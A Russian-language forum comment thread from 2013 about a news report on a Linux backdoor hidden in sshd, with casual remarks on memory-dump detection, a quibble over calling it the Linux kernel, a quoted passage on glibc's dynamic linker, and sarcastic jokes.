Елки-палки, оно модифицирует запущенный процесс sshd, а бинарник системный ему не интересен. анализ дампа памяти процесса нужен для отслеживания этих изменений, а поймать модификацию бинарника можно штатными командами практически любого пакетного менеджера.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 11:48 
Причём здесь ядро Linux?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Andrey Mitrofanov , 16-Ноя-13 11:52 
> Причём здесь ядро Linux?

Деситтна, GNU/Linux же!

...""a dynamic linker model where a portion of the executable includes a very simple linker stub which causes the operating system to load an external library into memory. [...] The source code for the GNU/Linux linker is part of the glibc [...] code is available under the GNU LGPL.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 17:07 
> is part of the glibc
> glibc

Причём здесь ведро Лёликс?


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 13:28 
> Причём здесь ядро Linux?

Потому что заказ на него.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 17-Ноя-13 14:21 
Надо просто издать закон, озвучить его на самом высоком уровне. Шалуны сами разбегутся ))